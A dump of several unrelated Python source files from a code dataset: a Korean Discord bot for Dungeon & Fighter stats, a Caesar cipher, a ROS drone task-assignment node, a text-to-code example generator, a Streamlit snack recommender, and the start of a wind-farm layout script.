\"https://api.neople.co.kr/df/servers/all/characters?characterName=\"\n URL += input\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = json.loads(new_response)\n await ctx.send(\"[\"+input+\"] 의 닉네임 개수는 \"+str(len(dict_data.get('rows')))+\"개에요 ㅇㅅㅇ\")\n\n\n@app.command(name='닉')\nasync def how_many_nicknames(ctx, input: str):\n URL = \"https://api.neople.co.kr/df/servers/all/characters?characterName=\"\n URL += input\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')\n server_list = ['cain', 'diregie', 'siroco', 'prey', 'casillas', 'hilder', 'anton', 'bakal']\n for data in dict_data:\n server_list.remove(data.get('serverId'))\n # 사용가능 서버명을 한글로 바꾸기\n server_list_kor = []\n for a in server_list:\n if 'cain' in a:\n server_list_kor.append(\"카인\")\n if 'diregie' in a:\n server_list_kor.append(\"디레지에\")\n if 'siroco' in a:\n server_list_kor.append(\"시로코\")\n if 'prey' in a:\n server_list_kor.append(\"프레이\")\n if 'casillas' in a:\n server_list_kor.append(\"카시야스\")\n if 'hilder' in a:\n server_list_kor.append(\"힐더\")\n if 'anton' in a:\n server_list_kor.append(\"안톤\")\n if 'bakal' in a:\n server_list_kor.append(\"바칼\")\n if len(server_list_kor) == 0:\n await ctx.send(\"닉네임 [\"+input+\"]은 사용이 불가능해요... ㅇㅅㅇ\")\n else:\n await ctx.send(\"닉네임 [\"+input+\"]을 쓸 수 있는 서버에요 ㅇㅅㅇ\\n\"+str(server_list_kor))\n\n\n@app.command(name='딜')\nasync def get_deal(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=cain&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"damage_side\"]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/ul/li[4]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/div[2]/div[2]/div/label[3]').click()\n browser.implicitly_wait(2)\n output = browser.find_element_by_class_name('sinergeDmg1').text\n browser.get(DUNOFF)\n\n _output_num = int(output.replace(',', ''))\n if _output_num >= 100000000:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+str(int(_output_num/100000000))+\"억] 이에요!!! ㅇㅅㅇ\")\n else:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+output+\"] 에요!!! ㅇㅅㅇ\")\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=\"\n DUNOFF += server_eng\n DUNOFF += \"&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"damage_side\"]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/ul/li[4]').click()\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"skill_damage\"]/div[2]/div[2]/div/label[3]').click()\n browser.implicitly_wait(2)\n output = browser.find_element_by_class_name('sinergeDmg1').text\n browser.get(DUNOFF)\n\n _output_num = int(output.replace(',', ''))\n if _output_num >= 100000000:\n await ctx.send(\"[카인 - \"+char_name+\"]님의 딜은 [\"+str(int(_output_num/100000000))+\"억] 이에요!!! ㅇㅅㅇ\")\n else:\n await ctx.send(\"[\" + server_kor + \" - \" + char_name + \"]님의 딜은 [\" + output + \"] 에요!!! ㅇㅅㅇ\")\n\n\n@app.command(name='버프력')\nasync def get_deal(ctx, *input: str):\n if len(input) is 1:\n char_name = str(input[0])\n URL = \"https://api.neople.co.kr/df/servers/cain/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=cain&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"holy_buff_side\"]').click()\n browser.implicitly_wait(1)\n output = browser.find_element_by_xpath('//*[@id=\"holy_buff_list\"]/div[1]/div[2]/div[10]/div/a').text\n browser.get(DUNOFF)\n await ctx.send(\"[카인 - \"+char_name+\"]님의 버프력은 [\"+output+\"] 에요!!! ㅇㅅㅇ\")\n else:\n server_kor = str(input[0])\n char_name = str(input[1])\n server_eng = server_name_converter.to_eng(server_kor)\n\n URL = \"https://api.neople.co.kr/df/servers/\"\n URL += server_eng\n URL += \"/characters?characterName=\"\n URL += char_name\n URL += neople_api_key\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n dict_data = (json.loads(new_response)).get('rows')[0]\n char_id = dict_data.get('characterId')\n\n DUNOFF = \"https://dunfaoff.com/SearchResult.df?server=\"\n DUNOFF += server_eng\n DUNOFF += \"&characterid=\"\n DUNOFF += char_id\n\n print(\"던오프 요청 ->\"+DUNOFF)\n\n browser.get(DUNOFF)\n browser.implicitly_wait(1)\n browser.find_element_by_xpath('//*[@id=\"holy_buff_side\"]').click()\n browser.implicitly_wait(1)\n output = browser.find_element_by_xpath('//*[@id=\"holy_buff_list\"]/div[1]/div[2]/div[10]/div/a').text\n browser.get(DUNOFF)\n await ctx.send(\"[\"+server_kor+\" - \" + char_name + \"]님의 버프력은 [\" + output + \"] 에요!!! ㅇㅅㅇ\")\n\n\n@app.command(name=\"시세\")\nasync def find_items_in_auction(ctx, *input: str):\n URL = \"https://api.neople.co.kr/df/auction?itemName=\"\n for a in input:\n URL += \"+\"+str(a)\n URL +=\"&limit=3&sort=unitPrice:asc&wordType=full\"\n URL += neople_api_key\n print(\"URL ->\"+URL)\n response = requests.get(URL).text\n new_response = response.replace(\"'\", \"\\\"\")\n arr_data = (json.loads(new_response)).get('rows')\n if arr_data is None:\n await ctx.send(\"검색어를 다르게 한번... 해보심이... ㅇㅅㅇ\")\n else:\n embed = discord.Embed(title='아이템 검색 결과 (베타)', color=discord.Color.blue())\n embed.set_thumbnail(url=(\"https://img-api.neople.co.kr/df/items/\"+arr_data[0].get('itemId')))\n for data in arr_data:\n embed.add_field(name=data.get('itemName'), value='가격: '+str(data.get('unitPrice'))+'골드, 개수'+str(data.get('count'))+'개', inline=False)\n await ctx.send(embed=embed)\n\n\n@app.command(name=\"오늘\")\nasync def what_day_today(ctx):\n t = [\"월요일 : 헬이나 도세요\", \"화요일 : 헬이나 도세요\", \"수요일 : 홍옥의 저주\", \"목요일 : 오큘러스, 산맥, 마대, 조안 페레로 3종던전\", \"금요일 : 오큘러스, 산맥, 마대\", \"토요일 : 레이드\", \"일요일 : 레이드\"]\n n = time.localtime().tm_wday\n await ctx.send(\"오늘은 \"+t[n])\n\n\napp.run(discord_api_key)\n","repo_name":"MinHeum/moon_rabbit","sub_path":"moon_rabbit.py","file_name":"moon_rabbit.py","file_ext":"py","file_size_in_byte":12941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33791408233","text":"from art import logo\n\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',\n 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\ndef caesar(start_text, shift_amount, cipher_direction):\n end_text = \"\"\n if cipher_direction == \"decode\":\n shift_amount *= -1\n for char in start_text:\n # Se deja como char el caractér de el alfabeto para cuando uno ingrese un elemento\n # que no existe en el alfabeto, se mantenga. Como un espacio o un signo.\n if char in alphabet:\n position = alphabet.index(char)\n new_position = position + shift_amount\n end_text += alphabet[new_position]\n else:\n end_text += char\n print(f\"Here's the {cipher_direction}d result: {end_text}\")\n\n\n# Se importa el logo desde el módulo art.\nprint(logo)\n\n# Se deja una variable en False, para que el ciclo se siga ejecutando\n# Se hacen las mismas preguntas que son la dirección, o sea, encriptar o decifrar el código\n# y luego cuantas letras se moverán, dependiendo de lo anterior\n# Finalmente, si en la última pregunta para continuar se dice que 'no', se termina el programa.\n# De otra manera, se sigue ejecutando.\nshould_end = False\nwhile not should_end:\n\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n# Se hace el módulo por 26 que son las letras del abecedario para que no se salga de la lista.\n# Igual se mantiene dos alfabetos dentro de la primera lista 'alphabet'.\n shift = shift % 26\n\n caesar(start_text=text, shift_amount=shift, cipher_direction=direction)\n\n restart = input(\n \"Type 'yes' if you want to go again. Otherwise type 'no'.\\n\")\n if restart == \"no\":\n should_end = True\n print(\"Adiós.\")\n","repo_name":"OneCalledFrank/Python100Days","sub_path":"Day 8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42933723001","text":"#! /usr/bin/env python3\n# coding=utf-8\n\n\nimport rospy\nfrom numpy import array, insert\nfrom scipy.optimize import linear_sum_assignment\nfrom modified_hungarian import unbalanced_assignment\n\nfrom std_msgs.msg import Int16\nfrom decision_maker.msg import Value, IdList, SwarmInfo\n\n\nclass CenterObj:\n def __init__(self, uav_num, swarm_id=-1):\n self.uav_num = uav_num\n self.swarm_id = swarm_id\n\n self.uav_chg_flag = False # 当集群内的无人机发生变化时转为True\n self.tar_chg_flag = False # 当目标发生变化时转为True\n\n self.assigned_talk_dict = {} # {uid: rospy.Publisher(uid, ...)} 中心对每个无人机的Publisher对象\n self.assigned_result_dict = {} # {uid: IdList()} 中心传回无人机的指派结果\n self.uid_set = set() # 指派算法开始时中心接收到了这些无人机发来的(对目标的)评估值,指派完成后clear()\n self.tid_set = set() # 指派算法开始时中心接收到了这些目标的评估值,指派完成后clear()\n self.uid_tnum_dict = {} # {uid: tar_num} 在上次运行指派算法时无人机uid发来中心的目标数量\n self.uid_tfd_dict = {} # {uid: {tid: fit}} 无人机uid发来中心的关于目标tid的评估值fit\n\n self.swarm_info_dict = {} # {uid: send_times} 无人机发来的其uid的次数,用于判断集群内有哪些无人机\n self.id_check_mult = 0.5 # 某无人机发送其ID的次数少于最大次数的该倍数时认为离开本群体\n self.center_info_talker = rospy.Publisher('center_info', SwarmInfo, queue_size=10)\n self.swarm_info_listener = rospy.Subscriber('swarm_info', SwarmInfo, self.swarm_info_update)\n # self.swarm_check_timer = rospy.Timer(rospy.Duration(0.5), self.swarm_info_check)\n\n fit_str = 'fitness' + str(self.swarm_id) if self.swarm_id >= 0 else 'fitness'\n self.fitness_listen = rospy.Subscriber(\n fit_str,\n Value,\n self.fitness_callback)\n\n self.assign_timer = rospy.Timer(rospy.Duration(0.5), self.assign_callback)\n\n def swarm_info_update(self, msg):\n if msg.swarm_id != self.swarm_id:\n return\n try:\n self.swarm_info_dict[msg.data] += 1\n except KeyError:\n self.swarm_info_dict[msg.data] = 1\n self.uav_chg_flag = True\n cen_msg = SwarmInfo()\n cen_msg.data = msg.data\n cen_msg.swarm_id = self.swarm_id\n self.center_info_talker.publish(cen_msg)\n\n def swarm_info_check(self, msg=None):\n if not self.swarm_info_dict:\n return\n std_times = max(self.swarm_info_dict.values())\n clear_list = []\n for uid in self.swarm_info_dict:\n if self.swarm_info_dict[uid] < std_times * self.id_check_mult:\n clear_list.append(uid)\n else:\n self.swarm_info_dict[uid] = 0\n for uid in clear_list:\n self.swarm_info_dict.pop(uid)\n try:\n self.uid_set.remove(uid)\n except KeyError:\n pass\n if self.uav_num != len(self.swarm_info_dict):\n self.uav_chg_flag = True\n self.uav_num = len(self.swarm_info_dict)\n\n def fitness_callback(self, msg):\n if msg.swarm_id != self.swarm_id:\n return\n if msg.uav_id not in self.assigned_talk_dict:\n assigned_talk = rospy.Publisher(\n 'assign_result'+str(msg.uav_id),\n IdList, # target_id_list\n queue_size=10)\n self.assigned_talk_dict[msg.uav_id] = assigned_talk\n self.assigned_result_dict[msg.uav_id] = IdList()\n if msg.fit_value_list: # 这个判断意味着当有目标被搜索到时,在当前群内的无人机都需要发送非空的评估值表,这样才算接收到了该无人机的评估值\n self.uid_set.add(msg.uav_id)\n # 检查目标是否有变化分为两步,第一步检查是否有新目标\n for tid, fit in zip(msg.tar_id_list, msg.fit_value_list):\n try:\n if tid not in self.uid_tfd_dict[msg.uav_id]:\n self.tar_chg_flag = True\n self.uid_tfd_dict[msg.uav_id][tid] = fit\n except KeyError:\n self.uid_tfd_dict[msg.uav_id] = {tid: fit}\n self.uav_chg_flag = True\n self.tid_set.add(tid)\n # 第二步检查无人机传给中心的目标数有无变化\n try:\n if self.uid_tnum_dict[msg.uav_id] != len(msg.tar_id_list):\n self.tar_chg_flag = True\n except KeyError:\n self.uav_chg_flag = True\n finally:\n self.uid_tnum_dict[msg.uav_id] = len(msg.tar_id_list)\n\n def assign_callback(self, msg):\n self.swarm_info_check()\n # print('uavnum', self.uav_num)\n # print(0, self.uav_chg_flag, self.tar_chg_flag, len(self.uid_set), self.uav_num, self.swarm_info_dict.keys(), self.uid_set, self.tid_set)\n if (self.uav_chg_flag or self.tar_chg_flag) and (len(self.uid_set) == self.uav_num and self.swarm_info_dict.keys() == self.uid_set): # 判断无人机与目标是否变化and群内无人机是否都将评估值传到中心\n # print(1, self.uav_chg_flag, self.tar_chg_flag, len(self.uid_set), self.uav_num, self.swarm_info_dict.keys(), self.uid_set, self.tid_set)\n # 当某个无人机发现一个新目标时,其他无人机还没收到新目标的消息,但运行了评估函数并publish了Value,这时会导致无人机的目标数不一致,在这进行处理\n max_fit = float('-inf')\n add_tuple_list = []\n for uid in self.uid_set:\n for tid in self.tid_set:\n if tid not in self.uid_tfd_dict[uid]:\n add_tuple_list.append((uid, tid))\n else:\n max_fit = self.uid_tfd_dict[uid][tid] if self.uid_tfd_dict[uid][tid] > max_fit else max_fit\n for _tup in add_tuple_list:\n self.uid_tfd_dict[_tup[0]][_tup[1]] = max_fit\n # 重置重分配条件标志位\n self.uav_chg_flag = False\n self.tar_chg_flag = False\n for u_i in self.assigned_result_dict:\n self.assigned_result_dict[u_i].target_id_list.clear()\n # 计算每个目标需要几架无人机\n try:\n assign_num = self.uav_num // len(self.tid_set)\n except ZeroDivisionError:\n assign_num = self.uav_num\n if assign_num < 1:\n assign_num = 1\n elif assign_num > self.uav_num // 2 and self.uav_num > 1:\n assign_num = self.uav_num // 2\n if assign_num < 2 and self.uav_num > 2:\n assign_num = 2\n # 生成价值矩阵\n tid_list = list(self.tid_set)\n uid_list = list(self.uid_set)\n assign_matrix = array([[self.uid_tfd_dict[uid][tid] for tid in tid_list] for uid in uid_list])\n # 任务分配算法\n # print(len(self.tid_set), self.uav_num, assign_num, 'assignnum')\n for _ in range(assign_num):\n if len(tid_list) <= len(uid_list):\n assign_uav, assign_tar = linear_sum_assignment(assign_matrix)\n else:\n assign_uav, assign_tar = unbalanced_assignment(assign_matrix)\n for ui, ti in zip(assign_uav, assign_tar):\n self.assigned_result_dict[uid_list[ui]].target_id_list.append(tid_list[ti])\n assign_matrix[ui][ti] += max_fit\n # for t_i in tid_list:\n # uid_list.sort(key=lambda x: self.uid_tfd_dict[x][t_i])\n # for r_i in range(assign_num):\n # u_i = uid_list[r_i]\n # self.assigned_result_dict[u_i].target_id_list.append(t_i)\n for a_talk, a_result in zip(self.assigned_talk_dict.values(), self.assigned_result_dict.values()):\n a_talk.publish(a_result)\n self.uid_set.clear()\n self.tid_set.clear()\n\n\ndef main():\n center_obj = CenterObj(uav_num=3)\n rospy.spin()\n\n\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n\n","repo_name":"KennethYangle/jz_ws","sub_path":"decision_maker/scripts/center_uav.py","file_name":"center_uav.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"12689800242","text":"import string\nimport numpy as np\nfrom typing import Optional, List\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Function:\n name: str\n obj: Optional[str]\n args: List[List[str]]\n return_type: List[str]\n\n\n@dataclass\nclass Operator:\n name: str\n name_str: str\n args: List[List[str]]\n return_type: List[str]\n\n\n# Types\nany = [\"str\", \"int\", \"float\", \"bool\", \"list\"]\nnumber = [\"int\", \"float\"]\n\n# Variables\nvariables = {\n \"func\": [\"f\", \"g\"],\n \"any\": [\"x\", \"y\", \"z\"],\n \"number\": [\"x\", \"y\", \"z\"],\n \"str\": [\"x\", \"y\", \"s\", \"t\"],\n \"int\": [\"x\", \"y\", \"i\", \"n\"],\n \"float\": [\"x\", \"y\", \"z\", \"f\"],\n \"bool\": [\"x\", \"y\", \"c\", \"cond\"],\n \"list\": [\"xs\", \"ys\", \"values\"],\n}\n\n# Builtin Functions\nfunctions = [\n Function(\"print\", None, [any], []),\n Function(\"append\", \"list\", [any], []),\n Function(\"insert\", \"list\", [\n [\"int\"], any], []),\n Function(\"len\", None, [[\"list\"]], [\"int\"]),\n Function(\"str\", None, [any], [\"str\"]),\n Function(\"range\", None, [[\"int\"]], [\"list\"]),\n Function(\"@get\", None, [[\"list\"], [\"int\"]], any),\n Function(\"@del\", None, [[\"list\"], [\"int\"]], []),\n]\noperators = [\n # Operator(\"+\", \"plus\", [[\"int\"], [\"int\"]], \"int\"),\n # Operator(\"-\", \"minus\", [[\"int\"], [\"int\"]], \"int\"),\n # Operator(\"*\", \"multiply\", [[\"int\"], [\"int\"]], \"int\"),\n Operator(\"+\", \"plus\", [number, number], number),\n Operator(\"-\", \"minus\", [number, number], number),\n Operator(\"*\", \"multiply\", [number, number], number),\n Operator(\"/\", \"divide\", [number, number], number),\n Operator(\"//\", \"divide as integer\", [number, number], [\"int\"]),\n Operator(\"%\", \"modulo\", [[\"int\"], [\"int\"]], [\"int\"]),\n Operator(\"**\", \"power of\", [number, number], number),\n Operator(\"in\", \"in\", [any, [\"list\"]], [\"bool\"]),\n Operator(\"is\", \"is\", [any, any], [\"bool\"]),\n Operator(\"==\", \"equal\", [any, any], [\"bool\"]),\n Operator(\"!=\", \"not equal\", [any, any], [\"bool\"]),\n]\ninplaces = [\"+\", \"-\", \"*\", \"/\", \"//\", \"%\"]\n\n\n@dataclass\nclass Example:\n text: str\n code: str\n\n\nclass Generator:\n def __init__(self, rng: np.random.RandomState):\n self.rng = rng\n\n def _create_variable(self, t: str) -> Example:\n v = self.rng.choice(variables[t])\n return Example(v, v)\n\n def _create_constant(self, t: str) -> Example:\n if t == \"int\":\n i = str(self.rng.randint(0, 100))\n return Example(i, i)\n elif t == \"float\":\n f = \"{:.2f}\".format(self.rng.rand())\n return Example(f, f)\n elif t == \"str\":\n n = self.rng.randint(0, 10)\n t = ''.join(self.rng.choice(list(string.ascii_letters), size=n))\n return Example(t, f'\"{t}\"')\n elif t == \"bool\":\n b = self.rng.choice([\"True\", \"False\"])\n return Example(b.lower(), b)\n elif t == \"list\":\n n = self.rng.randint(0, 3)\n if n == 0:\n return Example(\"the empty list\", \"[]\")\n else:\n subtype = self.rng.choice(any)\n text = \"the list of\"\n code = \"[\"\n for elem in [self._create_constant(subtype) for _ in range(n)]:\n text += f\" {elem.text}\"\n code += f\"{elem.code}, \"\n code += \"]\"\n return Example(text, code)\n raise AssertionError(f\"invalid type: {t}\")\n\n def _create_function_call(self, f: Optional[Function] = None) -> Example:\n if f is None:\n f = self.rng.choice(functions)\n\n if f.name.startswith(\"@\"):\n # specific function\n args = [self._create_constant(self.rng.choice(ts))\n for ts in f.args]\n if f.name == \"@get\":\n return Example(\n f\"{args[1].text} element of {args[0].text}\",\n f\"{args[0].code}[{args[1].code}]\"\n )\n elif f.name == \"@del\":\n return Example(\n f\"delete {args[1].text} element from {args[0].text}\",\n f\"del {args[0].code}[{args[1].code}]\"\n )\n raise AssertionError(f\"invalid function name: {f.name}\")\n if f.obj is None:\n # function\n text = f\"{f.name}\"\n code = f\"{f.name}(\"\n else:\n # method\n obj = self._create_variable(f.obj)\n text = f\"{obj.text} {f.name}\"\n code = f\"{obj.text}.{f.name}(\"\n for arg in [self._create_constant(self.rng.choice(ts))\n for ts in f.args]:\n text += f\" {arg.text}\"\n code += f\"{arg.code},\"\n code += \")\"\n return Example(text, code)\n\n def _create_operator(self, op: Optional[Operator] = None) -> Example:\n if op is None:\n op = self.rng.choice(operators)\n use_str = self.rng.choice([False, True])\n if use_str:\n op_str = op.name_str\n else:\n op_str = op.name\n\n text = \"\"\n code = \"(\"\n args = [self._create_constant(self.rng.choice(ts)) for ts in op.args]\n for i, arg in enumerate(args):\n text += arg.text\n code += arg.code\n if i != len(args) - 1:\n text += f\" {op_str} \"\n code += f\" {op.name} \"\n code += \")\"\n return Example(text, code)\n\n def _create_expression(self, types: List[str]) -> Example:\n t = self.rng.choice(types)\n funcs = [f for f in functions\n if t in f.return_type or f.return_type == types]\n ops = [f for f in operators\n if t in f.return_type or f.return_type == types]\n cands = [\"constant\"] + [\"variable\"]\n if len(funcs) != 0:\n cands.append(\"function\")\n if len(ops) != 0:\n cands.append(\"operator\")\n c = self.rng.choice(cands)\n\n if c == \"constant\":\n return self._create_constant(t)\n elif c == \"variable\":\n return self._create_variable(t)\n elif c == \"function\":\n return self._create_function_call(self.rng.choice(funcs))\n elif c == \"operator\":\n return self._create_operator(self.rng.choice(ops))\n raise AssertionError(f\"invalid candidate: {c}\")\n\n def _create_assign(self) -> Example:\n t = self.rng.choice(any + [\"any\", \"number\"])\n x = self._create_variable(t)\n if t == \"number\":\n ts = number\n elif t == \"any\":\n ts = any\n else:\n ts = [t]\n v = self._create_expression(ts)\n return Example(\n f\"assign {x.text} with {v.text}\",\n f\"{x.code} = {v.code}\"\n )\n\n def _create_inplace(self) -> Example:\n inplace_op = self.rng.choice(inplaces)\n op = [op for op in operators if op.name == inplace_op][0]\n t = self.rng.choice(op.args[0])\n x = self._create_variable(t)\n v = self._create_expression(op.args[1])\n return Example(\n f\"assign {x.text} with {x.text} {op.name} {v.text}\",\n f\"{x.code} {op.name}= {v.code}\"\n )\n\n def _create_suite(self) -> Example:\n n = self.rng.randint(1, 3)\n funcs = [f for f in functions if f.return_type == []]\n funcs.extend([\"assign\", \"inplace\"])\n text = \"\"\n code = \"\"\n for i in range(n):\n x = self.rng.choice(funcs)\n if isinstance(x, Function):\n e = self._create_function_call(x)\n elif x == \"assign\":\n e = self._create_assign()\n elif x == \"inplace\":\n e = self._create_inplace()\n text += e.text\n code += e.code\n if i != (n - 1):\n text += \", \"\n code += \"\\n\"\n return Example(text, code)\n\n def _indent(self, text: str) -> str:\n lines = text.split(\"\\n\")\n lines = [\" \" + line for line in lines]\n return \"\\n\".join(lines)\n\n def _create_if(self) -> Example:\n has_elif = self.rng.choice([False, True])\n has_else = self.rng.choice([False, True])\n\n text = \"\"\n code = \"\"\n\n # if statement\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} if {c.text}.\"\n else:\n text += f\"if {c.text} do followings: {body.text}.\"\n code += f\"if {c.code}:\\n\" + self._indent(body.code)\n\n # elif statement\n if has_elif:\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} if {c.text}.\"\n else:\n text += f\"if {c.text} do followings: {body.text}.\"\n code += f\"\\nelif {c.code}:\\n\" + self._indent(body.code)\n\n # else statement\n if has_else:\n body = self._create_suite()\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"otherwise {body.text}.\"\n else:\n text += f\"otherwise do followings: {body.text}.\"\n code += \"\\nelse:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_while(self):\n c = self._create_expression([\"bool\"])\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} while {c.text}.\"\n else:\n text += f\"while {c.text} do followings: {body.text}.\"\n code += f\"while {c.code}:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_for(self):\n x = self._create_variable(\"any\")\n xs = self._create_expression([\"list\"])\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} for each {x.text} in {xs.text}.\"\n else:\n text += \\\n f\"for each {x.text} in {xs.text} do followings: {body.text}.\"\n code += f\"for {x.code} in {xs.code}:\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def _create_funcdef(self):\n name = self._create_variable(\"func\")\n n_arg = self.rng.randint(0, 3)\n args = [self._create_variable(\"any\") for _ in range(n_arg)]\n\n body = self._create_suite()\n text = \"\"\n code = \"\"\n if len(body.code.split(\"\\n\")) == 1:\n text += f\"{body.text} when {name.text}.\"\n else:\n text += \\\n f\"when {name.text} is called do followings: {body.text}.\"\n args_code = \",\".join([arg.code for arg in args])\n code += f\"def {name.code}({args_code}):\\n\" + self._indent(body.code)\n return Example(text, code)\n\n def create(self) -> Example:\n cands = [self._create_funcdef, self._create_for, self._create_while,\n self._create_if, self._create_assign, self._create_inplace,\n self._create_function_call, self._create_operator]\n c = self.rng.choice(cands)\n return c()\n","repo_name":"HiroakiMikami/python-introductory-qa","sub_path":"app/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"37573104380","text":"import streamlit as st\n#from requests_toolbelt.multipart.encoder import MultipartEncoder\nimport requests\nfrom PIL import Image\nimport io\nimport joblib\nfrom abcd import predict\nimport pandas as pd\n\n\nst.title('Microsoft Recommendation Algorithms for SNACKS')\nimage = Image.open('snack.jpg')\n\nst.image(image,use_column_width=True)\n\nst.markdown('',unsafe_allow_html=True)\nst.markdown('*ALGORITHMS FOR SNACKS SELECTION*')\n\n# Models\nrlrmc = open(\"GRU4Rec.SAV\",\"rb\")\nrlrmc_model = joblib.load(rlrmc)\nurl = 'http://127.0.0.1:8000/'\nendpoint = 'predict/'\n\ndef get_data(user_id,pro_id):\n server_url = url + endpoint + str(user_id) + ',' + str(pro_id)\n r= requests.get(server_url)\n return r.json()\n\nradio = st.radio(\n \"Choose an algorithm-->\",\n (\"GRU4Rec Algorithm\",\"LightGCN Algorithm\"))\n\nif radio == 'LightGCN Algorithm':\n \n title = st.number_input('User ID',min_value = 0,max_value=1000,value = 0,step =1)\n \n \n data = pd.read_csv('LightGCN.csv')\n df1 = data['userID']==title\n df2 = data[df1]\n data = pd.DataFrame(df2.iloc[:,1:4])\n\n st.dataframe(data)\n \n\nif radio == 'GRU4Rec Algorithm':\n \n title = st.number_input('User ID',min_value = 0,max_value=1000,value = 0,step =1)\n \n \n data = pd.read_csv('GRU4Rec.csv')\n df1 = data['userID']==title\n df2 = data[df1]\n data = pd.DataFrame(df2.iloc[:,1:4])\n\n st.dataframe(data)\n \n#image = Image.open('snack.jfif')\n\n#st.image(image, caption='Snack Recommendation',use_column_width=True)\n\n\n","repo_name":"YashPandya2001/Algorithmic-Digital-Marketing","sub_path":"Assignment_3/FastAPI & Streamlit/streamlit12.py","file_name":"streamlit12.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3474882349","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 11 07:52:00 2023\n\n@author: youssef\n\"\"\"\n\n\nimport os\nos.environ['SNOPT_LICENSE'] = '/home/youssef/snopt/snopt7.lic'\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom floris.tools import FlorisInterface\nfrom floris.tools.optimization.layout_optimization.layout_optimization_pyoptsparse import LayoutOptimizationPyOptSparse\nimport pdb\n# from floris.tools import visualize_cut_plane #, plot_turbines_with_fi\n# import floris.tools as wfct\n# import shapely\nfrom shapely.geometry import Polygon, LineString, Point\n\n\ndef sort_boundaries(boundaries):\n bnd=pd.DataFrame(boundaries, columns=['x','y'])\n bnd.mean()\n A=np.degrees(np.arctan2(bnd.y-bnd.mean()[1],bnd.x-bnd.mean()[0]))\n A %= 360\n A.sort_values()\n boundaries=bnd.reindex(A.sort_values().index).values.tolist()\n return boundaries\n\n\ndef ConcentricCirclesLayout(N_circles,spc,D):\n spc=spc*D\n y_coordinates=np.array(0)\n x_coordinates=np.array(0)\n for i in range(N_circles):\n i=i+1\n N_turbines=math.floor(2*np.pi*i)\n 